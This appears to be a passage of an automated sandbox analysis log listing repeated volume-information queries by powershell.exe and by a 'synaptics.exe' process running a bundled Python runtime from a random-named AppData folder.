                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\__init__.cpython-310.pyc.9333000 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\codecs.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\codecs.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\codecs.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\codecs.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\codecs.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\codecs.cpython-310.pyc.10052344 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\aliases.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\aliases.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\aliases.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\aliases.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\aliases.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\aliases.cpython-310.pyc.9333480 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\utf_8.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\utf_8.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\utf_8.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\utf_8.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\utf_8.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.9403600 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\cp1252.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\cp1252.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\cp1252.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\cp1252.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\cp1252.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.9333600 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\io.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\io.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\io.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\io.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\io.py VolumeInformationJump to behavior
